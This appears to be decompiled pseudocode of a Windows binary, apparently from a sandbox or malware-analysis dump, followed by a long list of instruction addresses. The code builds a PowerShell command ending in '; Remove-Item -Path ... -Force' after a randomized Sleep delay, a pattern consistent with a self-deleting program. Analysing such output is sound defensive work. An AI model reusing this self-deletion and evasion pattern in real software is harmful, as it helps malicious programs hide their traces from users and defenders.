				_t890 = E0000021521520587440(_t519, _t1383 + 0x20, _t544, _t1822);
				_t545 = _t1824 + 0x98; // 0x9b
				E0000021521520586820(_t890, 0, _t545);
				_t1823 = _t1822 + 0x90;
				if (_t1823 != _t1925) goto 0x2058b210;
				0x20589d60();
				_t546 = _t1824 + 0xf0; // 0xf3
				_t892 = E000002152152058C460(_t546);
				_t547 = _t1824 - 0x70; // -109
				E0000021521520586820(E0000021521520586820(_t892, 0, _t547), 0, _t1826 + 0x70);
				r14d = 0;
				r15d = 0x1000;
				goto 0x2058a6ad;
				r8d = E00000215215205FAB54(_t519);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t1003 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t1824 + 0x108) == 0) goto 0x2058b82f;
				E000002152152058C610(_t1383 + 0x20,  *(_t1824 + 0x108));
				0x205faea4();
				E00000215215205F51EC(_t519, _t1383 + 0x20, _t1823);
				_t1340 =  *((intOrPtr*)(_t1824 - 0x58));
				r15d = 0x1000;
				if (_t1340 - 0x10 < 0) goto 0x2058b8a0;
				_t1583 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1340 + 1 - _t1925 < 0) goto 0x2058b89b;
				if ((_t1003 & 0x0000001f) != 0) goto 0x2058c08d;
				_t1342 =  *((intOrPtr*)(_t1583 - 8));
				if (_t1342 - _t1583 >= 0) goto 0x2058c087;
				_t1584 = _t1583 - _t1342;
				if (_t1584 - 8 < 0) goto 0x2058c081;
				if (_t1584 - 0x27 > 0) goto 0x2058c07b;
				0x205f51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1920;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1343 =  *(_t1824 - 0x78);
				if (_t1343 - 0x10 < 0) goto 0x2058a86f;
				_t1586 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1343 + 1 - _t1925 < 0) goto 0x2058a86a;
				if ((_t1003 & 0x0000001f) != 0) goto 0x2058c0a5;
				_t1345 =  *((intOrPtr*)(_t1586 - 8));
				if (_t1345 - _t1586 >= 0) goto 0x2058c09f;
				_t1587 = _t1586 - _t1345;
				if (_t1587 - 8 < 0) goto 0x2058c099;
				if (_t1587 - 0x27 > 0) goto 0x2058c093;
				goto 0x2058a867;
				r8d = E00000215215205FAB54(_t1345);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t1005 = r8d * 0x3e8;
				Sleep(??);
				goto 0x2058a6c0;
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				_t574 = _t1824 + 0x170; // 0x173
				E000002152152058C440(_t1345, _t574);
				r13d =  ==  ? 1 : r13d;
				 *(_t1823 + 0x88) = r13d;
				_t576 = _t1824 + 0x170; // 0x173
				E000002152152058C310(1, _t1383 + 0x20, _t576, _t1823);
				_t577 = _t1824 + 0x170; // 0x173
				_t1346 = _t577;
				 *(_t1826 + 0x20) = _t1346;
				_t579 = _t1824 + 0x220; // 0x223
				_t580 = _t1824 + 0x190; // 0x193
				_t581 = _t1824 + 0x1d0; // 0x1d3
				_t582 = _t1824 + 0x2b8; // 0x2bb
				_t906 = E00000215215205C3D60(_t1346, _t1383 + 0x20, _t582, _t581, _t580, _t579);
				_t583 = _t1824 + 0xd0; // 0xd3
				E000002152152058C300(_t906, _t583,  *0x206830a8);
				_t584 = _t1346 + 0x20; // 0x20
				 *(_t1826 + 0x20) = _t1826 + 0x50;
				_t587 = _t1824 + 0x2b8; // 0x2bb
				_t588 = _t1824 + 0x318; // 0x31b
				_t908 = E000002152152059A7F0(_t1005, 0x28c1979 * r8d >> 0x20 >> 1, _t1042, 1, 0x28c1979 * r8d >> 0x20 >> 1 - 3, _t1383 + 0x20, _t588, _t1346, _t1817, _t1823, _t1824, _t584, _t587, _t1912);
				_t589 = _t1824 + 0x318; // 0x31b
				E0000021521520586820(_t908, _t1005, _t589);
				_t591 = _t1824 + 0x610; // 0x613
				E0000021521520587760(_t1346, _t591, _t587);
				_t592 = _t1824 + 0x278; // 0x27b
				E00000215215205868F0(_t592, "powershell", _t584);
				GetCurrentProcessId();
				_t593 = _t1824 + 0x518; // 0x51b
				E0000021521520589D20(_t593);
				_t594 = _t1824 + 0x318; // 0x31b
				E000002152152058CA20(_t1346, _t594, _t1346);
				_t595 = _t1824 + 0x278; // 0x27b
				_t915 = E00000215215205888F0(_t1005, _t1383 + 0x20, _t595, _t1346, _t587);
				_t596 = _t1824 + 0x318; // 0x31b
				_t916 = E0000021521520586820(_t915, _t1005, _t596);
				_t597 = _t1824 + 0x518; // 0x51b
				_t917 = E0000021521520586820(_t916, _t1005, _t597);
				_t598 = _t1824 + 0x278; // 0x27b
				E00000215215205888D0(_t917, _t1005, _t1346, _t1383 + 0x20, _t598, "; Remove-Item -Path \"", _t1346, _t587);
				_t599 = _t1824 + 0x610; // 0x613
				_t600 = _t1824 + 0x278; // 0x27b
				_t919 = E00000215215205888F0(_t1005, _t1383 + 0x20, _t600, _t599, _t587);
				_t601 = _t1824 + 0x278; // 0x27b
				_t920 = E00000215215205888D0(_t919, _t1005, _t1346, _t1384, _t601, "\" -Force", _t1346, _t587);
				_t602 = _t1824 + 0x278; // 0x27b
				_t921 = E00000215215205888D0(_t920, _t1005, _t1346, _t1384, _t602, "\"", _t1346, _t587);
				_t603 = _t1824 + 0x278; // 0x27b
				E00000215215205CB510(E0000021521520587DF0(_t921, _t603), 1, _t1384, _t1346, "\"");
				__imp__CoUninitialize();
				_t924 = TerminateThread(??, ??);
				_t604 = _t1824 + 0x278; // 0x27b
				_t925 = E0000021521520586820(_t924, _t1005, _t604);
				_t605 = _t1824 + 0x610; // 0x613
				_t926 = E0000021521520586820(_t925, _t1005, _t605);
				_t606 = _t1824 + 0x2b8; // 0x2bb
				E0000021521520586820(_t926, _t1005, _t606);
				_t607 = _t1824 + 0x170; // 0x173
				E000002152152058C3D0(_t607);
				goto 0x2058bfa7;
				_t982 =  *(_t1824 + 0x9c8) & 0x000000ff;
				if (_t982 == 0) goto 0x2058bbb9;
				 *(_t1826 + 0x20) = 1;
				_t610 = _t1824 + 0x150; // 0x153
				_t611 = _t1824 + 0x1b0; // 0x1b3
				_t612 = _t1824 + 0x4f8; // 0x4fb
				_t613 = _t1824 + 0x298; // 0x29b
				E0000021521520587ED0(_t982, 0, _t1384, _t613, _t612, _t1817, _t1823, _t611, _t610, 0x2063af30);
				goto 0x2058bbd3;
				r8d = 0;
				_t614 = _t1824 + 0x240; // 0x243
				_t615 = _t1824 + 0x1b0; // 0x1b3
				E0000021521520586C40(_t1384, _t615, _t614, _t1817, _t1823, _t611, _t610 | 0xffffffff);
				 *(_t1824 - 0x40) = 0x2063af30;
				 *(_t1824 - 0x38) = 0x2063af30;
				 *(_t1824 - 0x38) = 0xf;
				 *(_t1824 - 0x40) = 0x2063af30;
				 *((char*)(_t1824 - 0x50)) = 0;
				r8d = 0xa;
				_t621 = _t1824 - 0x50; // -77
				E0000021521520586B10(_t1384, _t621, "powershell", _t1823, _t611);
				_t932 = GetCurrentProcessId();
				_t622 = _t1824 + 0x170; // 0x173
				E0000021521520589D20(_t622);
				_t623 = _t1824 + 8; // 0xb
				E000002152152058CA20(_t1346, _t623, _t1346);
				r8d = r8d ^ r8d;
				_t624 = _t1824 - 0x50; // -77
				E0000021521520588D60(_t1384, _t624, _t1346, _t1817, _t1823, _t1824, _t1346, _t610 | 0xffffffffffffffff);
				_t1347 =  *((intOrPtr*)(_t1824 + 0x20));
				if (_t1347 - 0x10 < 0) goto 0x2058bc90;
				_t1619 =  *((intOrPtr*)(_t1824 + 8));
				if (_t1347 + 1 - _t1817 < 0) goto 0x2058bc8b;
				if ((_t1005 & 0x0000001f) == 0) goto 0x2058bc5e;
				0x205faadc();
				asm("int3");
				_t1349 =  *((intOrPtr*)(_t1619 - 8));
				if (_t1349 - _t1619 < 0) goto 0x2058bc6d;
				0x205faadc();
				asm("int3");
				_t1620 = _t1619 - _t1349;
				if (_t1620 - 8 >= 0) goto 0x2058bc7c;
				0x205faadc();
				asm("int3");
				if (_t1620 - 0x27 <= 0) goto 0x2058bc88;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *((long long*)(_t1824 + 0x20)) = 0xf;
				 *(_t1824 + 0x18) = 0x2063af30;
				 *((char*)(_t1824 + 8)) = 0;
				_t1350 =  *((intOrPtr*)(_t1824 + 0x188));
				if (_t1350 - 0x10 < 0) goto 0x2058bcf9;
				_t1622 =  *((intOrPtr*)(_t1824 + 0x170));
				if (_t1350 + 1 - _t1817 < 0) goto 0x2058bcf4;
				if ((_t1005 & 0x0000001f) == 0) goto 0x2058bcc7;
				0x205faadc();
				asm("int3");
				_t1352 =  *((intOrPtr*)(_t1622 - 8));
				if (_t1352 - _t1622 < 0) goto 0x2058bcd6;
				0x205faadc();
				asm("int3");
				_t1623 = _t1622 - _t1352;
				if (_t1623 - 8 >= 0) goto 0x2058bce5;
				0x205faadc();
				asm("int3");
				if (_t1623 - 0x27 <= 0) goto 0x2058bcf1;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *((long long*)(_t1824 + 0x188)) = 0xf;
				 *((long long*)(_t1824 + 0x180)) = 0x2063af30;
				 *((char*)(_t1824 + 0x170)) = 0;
				r8d = 0x15;
				_t641 = _t1824 - 0x50; // -77
				E0000021521520588C10(_t1384, _t641, "; Remove-Item -Path \"", _t1817, _t1824, _t1346);
				r8d = 0;
				_t642 = _t1824 + 0x1b0; // 0x1b3
				_t643 = _t1824 - 0x50; // -77
				E0000021521520588D60(_t1384, _t643, _t642, _t1817, _t1823, _t1824, _t1346, _t610 | 0xffffffffffffffff);
				r8d = 8;
				_t644 = _t1824 - 0x50; // -77
				E0000021521520588C10(_t1384, _t644, "\" -Force", _t1817, _t1824, _t1346);
				_t645 = _t1824 - 0x50; // -77
				if (_t982 == 0) goto 0x2058bd6c;
				r8d = 0xa;
				goto 0x2058bd79;
				r8d = 1;
				E0000021521520588C10(_t1384, _t645, "\"", _t1817, _t1824, _t1346);
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0xb8], xmm0");
				 *((long long*)(_t1824 + 0xc8)) = 0x2063af30;
				 *(_t1823 + 0x88) = 1;
				_t648 = _t1824 + 0xb8; // 0xbb
				E000002152152058C310(1, _t1384, _t648, _t1823);
				_t649 = _t1824 + 0xb8; // 0xbb
				 *(_t1826 + 0x20) = _t649;
				_t651 = _t1824 + 0x220; // 0x223
				_t652 = _t1824 + 0x190; // 0x193
				_t653 = _t1824 + 0x1d0; // 0x1d3
				_t654 = _t1824 - 0x18; // -21
				E00000215215205C3D60(_t649, _t1384, _t654, _t653, _t652, _t651);
				 *(_t1826 + 0x20) = _t1826 + 0x50;
				_t659 = _t1824 - 0x18; // -21
				_t660 = _t1824 + 0x2f8; // 0x2fb
				_t943 = E000002152152059A7F0(_t1005, _t932, 0x1000, 1, _t982, _t1384, _t660, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)), _t1817, _t1823, _t1824, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20, _t659, _t1912);
				_t1355 =  *((intOrPtr*)(_t1824 + 0x310));
				if (_t1355 - 0x10 < 0) goto 0x2058be5e;
				_t1632 =  *((intOrPtr*)(_t1824 + 0x2f8));
				if (_t1355 + 1 - _t1817 < 0) goto 0x2058be59;
				if ((_t1005 & 0x0000001f) == 0) goto 0x2058be2c;
				0x205faadc();
				asm("int3");
				_t1357 =  *((intOrPtr*)(_t1632 - 8));
				if (_t1357 - _t1632 < 0) goto 0x2058be3b;
				0x205faadc();
				asm("int3");
				_t1633 = _t1632 - _t1357;
				if (_t1633 - 8 >= 0) goto 0x2058be4a;
				0x205faadc();
				asm("int3");
				if (_t1633 - 0x27 <= 0) goto 0x2058be56;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				_t666 = _t1824 - 0x50; // -77
				_t1636 =  >=  ?  *((void*)(_t1824 - 0x50)) : _t666;
				E00000215215205CB510(_t943, 1, _t1384,  >=  ?  *((void*)(_t1824 - 0x50)) : _t666, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)));
				__imp__CoUninitialize();
				TerminateThread(??, ??);
				_t1358 =  *_t1824;
				if (_t1358 - 0x10 < 0) goto 0x2058beda;
				_t1638 =  *((intOrPtr*)(_t1824 - 0x18));
				if (_t1358 + 1 - _t1817 < 0) goto 0x2058bed5;
				if ((_t1005 & 0x0000001f) == 0) goto 0x2058bea8;
				0x205faadc();
				asm("int3");
				_t1360 =  *((intOrPtr*)(_t1638 - 8));
				if (_t1360 - _t1638 < 0) goto 0x2058beb7;
				0x205faadc();
				asm("int3");
				_t1639 = _t1638 - _t1360;
				if (_t1639 - 8 >= 0) goto 0x2058bec6;
				0x205faadc();
				asm("int3");
				if (_t1639 - 0x27 <= 0) goto 0x2058bed2;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *_t1824 = 0xf;
				 *(_t1824 - 8) = 0x2063af30;
				 *((char*)(_t1824 - 0x18)) = 0;
				if ( *((intOrPtr*)(_t1824 + 0xb8)) == 0) goto 0x2058bf44;
				_t948 = E000002152152058C690(E000002152152058CA80( *((intOrPtr*)(_t1824 + 0xb8)),  *((intOrPtr*)(_t1824 + 0xb8)),  *(_t1824 + 0xc0), ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20) * ( *((intOrPtr*)(_t1824 + 0xc8)) -  *((intOrPtr*)(_t1824 + 0xb8))) >> 0x20,  *((intOrPtr*)(_t1824 + 0xb8)),  *((intOrPtr*)(_t1824 + 0xb8)), _t1823, ( *(_t1824 + 0xc0) >> 3 >> 0x3f) + ( *(_t1824 + 0xc0) >> 3));
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0xb8], xmm0");
				 *((long long*)(_t1824 + 0xc8)) = 0x2063af30;
				_t1362 =  *(_t1824 - 0x38);
				if (_t1362 - 0x10 < 0) goto 0x2058bf97;
				_t1644 =  *((intOrPtr*)(_t1824 - 0x50));
				if (_t1362 + 1 - _t1817 < 0) goto 0x2058bf92;
				if ((_t1005 & 0x0000001f) == 0) goto 0x2058bf65;
				0x205faadc();
				asm("int3");
				_t1364 =  *((intOrPtr*)(_t1644 - 8));
				if (_t1364 - _t1644 < 0) goto 0x2058bf74;
				0x205faadc();
				asm("int3");
				_t1645 = _t1644 - _t1364;
				if (_t1645 - 8 >= 0) goto 0x2058bf83;
				0x205faadc();
				asm("int3");
				if (_t1645 - 0x27 <= 0) goto 0x2058bf8f;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *(_t1824 - 0x38) = 0xf;
				 *(_t1824 - 0x40) = 0x2063af30;
				 *((char*)(_t1824 - 0x50)) = 0;
				_t691 = _t1824 + 0x98; // 0x9b
				E0000021521520586820(_t948, _t1005, _t691);
				_t692 = _t1824 + 0xf0; // 0xf3
				_t950 = E000002152152058C460(_t692);
				_t693 = _t1824 - 0x70; // -109
				E0000021521520586820(E0000021521520586820(_t950, _t1005, _t693), _t1005, _t1826 + 0x70);
				_t695 = _t1824 - 0x30; // -45
				_t953 = E000002152152058C3D0(_t695);
				_t696 = _t1824 + 0x240; // 0x243
				_t954 = E0000021521520586820(_t953, _t1005, _t696);
				_t697 = _t1824 + 0x4d8; // 0x4db
				_t955 = E0000021521520586820(_t954, _t1005, _t697);
				_t698 = _t1824 + 0x220; // 0x223
				_t956 = E0000021521520586820(_t955, _t1005, _t698);
				_t699 = _t1824 + 0x4f8; // 0x4fb
				_t957 = E0000021521520586820(_t956, _t1005, _t699);
				_t700 = _t1824 + 0x298; // 0x29b
				_t958 = E0000021521520586820(_t957, _t1005, _t700);
				_t701 = _t1824 + 0x1d0; // 0x1d3
				_t959 = E0000021521520586820(_t958, _t1005, _t701);
				_t702 = _t1824 + 0x2d8; // 0x2db
				_t960 = E0000021521520586820(_t959, _t1005, _t702);
				_t703 = _t1824 + 0x370; // 0x373
				_t961 = E0000021521520586820(_t960, _t1005, _t703);
				_t704 = _t1824 + 0x1b0; // 0x1b3
				E0000021521520586820(_t961, _t1005, _t704);
				_t705 = _t1824 + 0xd0; // 0xd3
				_t963 = E00000215215205876D0(_t1364,  *((intOrPtr*)(_t1824 + 0xb8)), _t705, _t1823);
				_t706 = _t1824 + 0x190; // 0x193
				_t965 = E0000021521520586820(E0000021521520586820(_t963, _t1005, _t706), _t1005, _t1826 + 0x50);
				goto 0x2058c0ab;
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				asm("int3");
				0x205faadc();
				_t708 = _t1824 + 0x150; // 0x153
				E0000021521520586820(_t965, _t1005, _t708);
				return 0;
			}




























































































































































































                0x21520589e00
                0x21520589e00
                0x21520589e00
                0x21520589e0c
                0x21520589e14
                0x21520589e1b
                0x21520589e26
                0x21520589e2e
                0x21520589e31
                0x21520589e38
                0x21520589e3f
                0x21520589e4a
                0x21520589e51
                0x21520589e58
                0x21520589e62
                0x21520589e67
                0x21520589e75
                0x21520589e77
                0x21520589e7b
                0x21520589e8c
                0x21520589e91
                0x21520589e98
                0x21520589ea0
                0x21520589ea8
                0x21520589ead
                0x21520589eb4
                0x21520589eb9
                0x21520589ebe
                0x21520589ecc
                0x21520589ed1
                0x21520589ed8
                0x21520589edd
                0x21520589ee2
                0x21520589eeb
                0x21520589ef0
                0x21520589f03
                0x21520589f08
                0x21520589f18
                0x21520589f1f
                0x21520589f40
                0x21520589f51
                0x21520589f57
                0x21520589f63
                0x21520589f69
                0x21520589f7d
                0x21520589f8d
                0x21520589f93
                0x21520589f9f
                0x21520589fa5
                0x21520589fb5
                0x21520589fc5
                0x21520589fcb
                0x21520589fd7
                0x21520589fdd
                0x21520589fed
                0x21520589ffd
                0x2152058a003
                0x2152058a00f
                0x2152058a015
                0x2152058a059
                0x2152058a05e
                0x2152058a065
                0x2152058a06c
                0x2152058a077
                0x2152058a07e
                0x2152058a08c
                0x2152058a091
                0x2152058a097
                0x2152058a0a8
                0x2152058a0b4
                0x2152058a0ba
                0x2152058a0be
                0x2152058a0c2
                0x2152058a0ca
                0x2152058a0ce
                0x2152058a0da
                0x2152058a0df
                0x2152058a0ed
                0x2152058a0f7
                0x2152058a0fd
                0x2152058a101
                0x2152058a105
                0x2152058a10d
                0x2152058a111
                0x2152058a11c
                0x2152058a121
                0x2152058a127
                0x2152058a138
                0x2152058a141
                0x2152058a157
                0x2152058a15d
                0x2152058a163
                0x2152058a16b
                0x2152058a170
                0x2152058a177
                0x2152058a17c
                0x2152058a17e
                0x2152058a183
                0x2152058a184
                0x2152058a18b
                0x2152058a18d
                0x2152058a192
                0x2152058a193
                0x2152058a19a
                0x2152058a19c
                0x2152058a1a1
                0x2152058a1a6
                0x2152058a1a8
                0x2152058a1ad
                0x2152058a1b1
                0x2152058a1b6
                0x2152058a1be
                0x2152058a1c2
                0x2152058a1c6
                0x2152058a1ce
                0x2152058a1d3
                0x2152058a1db
                0x2152058a1e0
                0x2152058a1e2
                0x2152058a1e7
                0x2152058a1e8
                0x2152058a1ef
                0x2152058a1f1
                0x2152058a1f6
                0x2152058a1f7
                0x2152058a1fe
                0x2152058a200
                0x2152058a205
                0x2152058a20a
                0x2152058a20c
                0x2152058a211
                0x2152058a215
                0x2152058a21a
                0x2152058a222
                0x2152058a226
                0x2152058a231
                0x2152058a242
                0x2152058a248
                0x2152058a254
                0x2152058a25a
                0x2152058a26e
                0x2152058a27e
                0x2152058a284
                0x2152058a290
                0x2152058a296
                0x2152058a2a6
                0x2152058a2b6
                0x2152058a2bc
                0x2152058a2c8
                0x2152058a2ce
                0x2152058a2de
                0x2152058a2ee
                0x2152058a2f4
                0x2152058a300
                0x2152058a306
                0x2152058a347
                0x2152058a34c
                0x2152058a353
                0x2152058a35a
                0x2152058a365
                0x2152058a36c
                0x2152058a377
                0x2152058a37d
                0x2152058a382
                0x2152058a387
                0x2152058a38c
                0x2152058a392
                0x2152058a397
                0x2152058a39c
                0x2152058a39f
                0x2152058a3a7
                0x2152058a3ad
                0x2152058a3b2
                0x2152058a3b9
                0x2152058a3bf
                0x2152058a3c3
                0x2152058a3c9
                0x2152058a3d3
                0x2152058a3da
                0x2152058a3e0
                0x2152058a3e8
                0x2152058a3ed
                0x2152058a3f4
                0x2152058a3f9
                0x2152058a3fb
                0x2152058a400
                0x2152058a401
                0x2152058a408
                0x2152058a40a
                0x2152058a40f
                0x2152058a410
                0x2152058a417
                0x2152058a419
                0x2152058a41e
                0x2152058a423
                0x2152058a425
                0x2152058a42a
                0x2152058a42e
                0x2152058a433
                0x2152058a43b
                0x2152058a43f
                0x2152058a445
                0x2152058a44c
                0x2152058a453
                0x2152058a45a
                0x2152058a461
                0x2152058a468
                0x2152058a46f
                0x2152058a476
                0x2152058a47d
                0x2152058a484
                0x2152058a489
                0x2152058a490
                0x2152058a495
                0x2152058a4a4
                0x2152058a4ac
                0x2152058a4b3
                0x2152058a4ba
                0x2152058a4bf
                0x2152058a4c6
                0x2152058a4cb
                0x2152058a4d2
                0x2152058a4d9
                0x2152058a4df
                0x2152058a4ed
                0x2152058a4ef
                0x2152058a4fe
                0x2152058a504
                0x2152058a513
                0x2152058a516
                0x2152058a51d
                0x2152058a524
                0x2152058a538
                0x2152058a53f
                0x2152058a546
                0x2152058a54c
                0x2152058a553
                0x2152058a566
                0x2152058a568
                0x2152058a572
                0x2152058a579
                0x2152058a57e
                0x2152058a58c
                0x2152058a593
                0x2152058a59d
                0x2152058a5a3
                0x2152058a5aa
                0x2152058a5b0
                0x2152058a5b7
                0x2152058a5bc
                0x2152058a5c3
                0x2152058a5d1
                0x2152058a5dd
                0x2152058a5e4
                0x2152058a5e9
                0x2152058a5f7
                0x2152058a5fe
                0x2152058a608
                0x2152058a60e
                0x2152058a615
                0x2152058a61b
                0x2152058a622
                0x2152058a627
                0x2152058a62e
                0x2152058a635
                0x2152058a640
                0x2152058a647
                0x2152058a652
                0x2152058a655
                0x2152058a65c
                0x2152058a663
                0x2152058a669
                0x2152058a678
                0x2152058a687
                0x2152058a68a
                0x2152058a691
                0x2152058a69a
                0x2152058a6a1
                0x2152058a6a4
                0x2152058a6a9
                0x2152058a6b7
                0x2152058a6c0
                0x2152058a6ca
                0x2152058a6db
                0x2152058a6f7
                0x2152058a702
                0x2152058a704
                0x2152058a721
                0x2152058a723
                0x2152058a728
                0x2152058a72e
                0x2152058a731
                0x2152058a738
                0x2152058a73c
                0x2152058a741
                0x2152058a748
                0x2152058a74f
                0x2152058a75b
                0x2152058a77c
                0x2152058a781
                0x2152058a786
                0x2152058a78a
                0x2152058a795
                0x2152058a7a0
                0x2152058a7b3
                0x2152058a7b6
                0x2152058a7ba
                0x2152058a7c1
                0x2152058a7c8
                0x2152058a7d0
                0x2152058a7d5
                0x2152058a7dc
                0x2152058a7e1
                0x2152058a7e7
                0x2152058a7ee
                0x2152058a7f4
                0x2152058a7fb
                0x2152058a805
                0x2152058a80e
                0x2152058a813
                0x2152058a81b
                0x2152058a81f
                0x2152058a823
                0x2152058a82b
                0x2152058a82d
                0x2152058a838
                0x2152058a83d
                0x2152058a843
                0x2152058a84a
                0x2152058a850
                0x2152058a857
                0x2152058a861
                0x2152058a86a
                0x2152058a86f
                0x2152058a877
                0x2152058a87b
                0x2152058a880
                0x2152058a88b
                0x2152058a898
                0x2152058a89e
                0x2152058a8a3
                0x2152058a8aa
                0x2152058a8b0
                0x2152058a8b9
                0x2152058a8be
                0x2152058a8c2
                0x2152058a8c9
                0x2152058a8cf
                0x2152058a8d6
                0x2152058a8dd
                0x2152058a8e4
                0x2152058a8eb
                0x2152058a8f3
                0x2152058a8f6
                0x2152058a8fe
                0x2152058a901
                0x2152058a909
                0x2152058a911
                0x2152058a918
                0x2152058a923
                0x2152058a92a
                0x2152058a938
                0x2152058a93d
                0x2152058a942
                0x2152058a949
                0x2152058a94c
                0x2152058a954
                0x2152058a958
                0x2152058a95c
                0x2152058a960
                0x2152058a967
                0x2152058a96e
                0x2152058a977
                0x2152058a97c
                0x2152058a983
                0x2152058a98d
                0x2152058a998
                0x2152058a9ab
                0x2152058a9ae
                0x2152058a9b2
                0x2152058a9b9
                0x2152058a9ca
                0x2152058a9cc
                0x2152058a9d9
                0x2152058a9e8
                0x2152058a9ee
                0x2152058a9f6
                0x2152058a9fb
                0x2152058aa02
                0x2152058aa07
                0x2152058aa0d
                0x2152058aa14
                0x2152058aa1a
                0x2152058aa21
                0x2152058aa2b
                0x2152058aa34
                0x2152058aa39
                0x2152058aa41
                0x2152058aa45
                0x2152058aa49
                0x2152058aa51
                0x2152058aa57
                0x2152058aa62
                0x2152058aa6b
                0x2152058aa71
                0x2152058aa78
                0x2152058aa7e
                0x2152058aa85
                0x2152058aa8f
                0x2152058aa95
                0x2152058aa9e
                0x2152058aaa5
                0x2152058aaaa
                0x2152058aaad
                0x2152058aab9
                0x2152058aad0
                0x2152058aad3
                0x2152058aadd
                0x2152058aae4
                0x2152058aaeb
                0x2152058aaf3
                0x2152058aaf7
                0x2152058aafb
                0x2152058ab04
                0x2152058ab20
                0x2152058ab23
                0x2152058ab27
                0x2152058ab2e
                0x2152058ab32
                0x2152058ab39
                0x2152058ab3f
                0x2152058ab42
                0x2152058ab5a
                0x2152058ab5d
                0x2152058ab67
                0x2152058ab6e
                0x2152058ab75
                0x2152058ab7d
                0x2152058ab85
                0x2152058ab89
                0x2152058ab92
                0x2152058abae
                0x2152058abb1
                0x2152058abb5
                0x2152058abbc
                0x2152058abc0
                0x2152058abc7
                0x2152058abd2
                0x2152058abda
                0x2152058abde
                0x2152058abe2
                0x2152058ac01
                0x2152058ac05
                0x2152058ac0c
                0x2152058ac10
                0x2152058ac17
                0x2152058ac1d
                0x2152058ac27
                0x2152058ac2c
                0x2152058ac41
                0x2152058ac44
                0x2152058ac4b
                0x2152058ac51
                0x2152058ac57
                0x2152058ac60
                0x2152058ac67
                0x2152058ac6e
                0x2152058ac79
                0x2152058ac80
                0x2152058ac87
                0x2152058ac8e
                0x2152058ac95
                0x2152058aca0
                0x2152058aca7
                0x2152058acae
                0x2152058acb5
                0x2152058acbc
                0x2152058acc7
                0x2152058acce
                0x2152058acd5
                0x2152058acdc
                0x2152058ace3
                0x2152058acee
                0x2152058acf5
                0x2152058ad01
                0x2152058ad11
                0x2152058ad14
                0x2152058ad1e
                0x2152058ad28
                0x2152058ad30
                0x2152058ad38
                0x2152058ad3c
                0x2152058ad45
                0x2152058ad61
                0x2152058ad64
                0x2152058ad68
                0x2152058ad6f
                0x2152058ad76
                0x2152058ad85
                0x2152058ad8b
                0x2152058ad91
                0x2152058ad96
                0x2152058ada8
                0x2152058adad
                0x2152058adb4
                0x2152058adc3
                0x2152058adc6
                0x2152058add0
                0x2152058adda
                0x2152058ade2
                0x2152058adea
                0x2152058adee
                0x2152058adf7
                0x2152058ae13
                0x2152058ae16
                0x2152058ae1a
                0x2152058ae21
                0x2152058ae28
                0x2152058ae37
                0x2152058ae3d
                0x2152058ae43
                0x2152058ae48
                0x2152058ae58
                0x2152058ae5d
                0x2152058ae64
                0x2152058ae73
                0x2152058ae76
                0x2152058ae80
                0x2152058ae8a
                0x2152058ae92
                0x2152058ae96
                0x2152058ae9a
                0x2152058aea6
                0x2152058aec8
                0x2152058aecb
                0x2152058aed2
                0x2152058aed9
                0x2152058aee0
                0x2152058aee8
                0x2152058aef8
                0x2152058aefb
                0x2152058af05
                0x2152058af0f
                0x2152058af17
                0x2152058af1f
                0x2152058af26
                0x2152058af32
                0x2152058af54
                0x2152058af57
                0x2152058af5e
                0x2152058af68
                0x2152058af72
                0x2152058af81
                0x2152058af87
                0x2152058af8d
                0x2152058af92
                0x2152058afa8
                0x2152058afad
                0x2152058afb4
                0x2152058afb9
                0x2152058afc3
                0x2152058afc5
                0x2152058afcf
                0x2152058afd1
                0x2152058affd
                0x2152058afff
                0x2152058b003
                0x2152058b008
                0x2152058b010
                0x2152058b022
                0x2152058b02c
                0x2152058b031
                0x2152058b037
                0x2152058b03d
                0x2152058b03f
                0x2152058b043
                0x2152058b048
                0x2152058b04c
                0x2152058b050
                0x2152058b057
                0x2152058b061
                0x2152058b063
                0x2152058b06d
                0x2152058b073
                0x2152058b07a
                0x2152058b07e
                0x2152058b085
                0x2152058b08b
                0x2152058b092
                0x2152058b098
                0x2152058b09f
                0x2152058b0a5
                0x2152058b0ac
                0x2152058b0b8
                0x2152058b0be
                0x2152058b0c5
                0x2152058b0d5
                0x2152058b0da
                0x2152058b0e1
                0x2152058b0ea
                0x2152058b0f5
                0x2152058b108
                0x2152058b10b
                0x2152058b10f
                0x2152058b116
                0x2152058b127
                0x2152058b129
                0x2152058b136
                0x2152058b149
                0x2152058b14f
                0x2152058b153
                0x2152058b15d
                0x2152058b162
                0x2152058b169
                0x2152058b16e
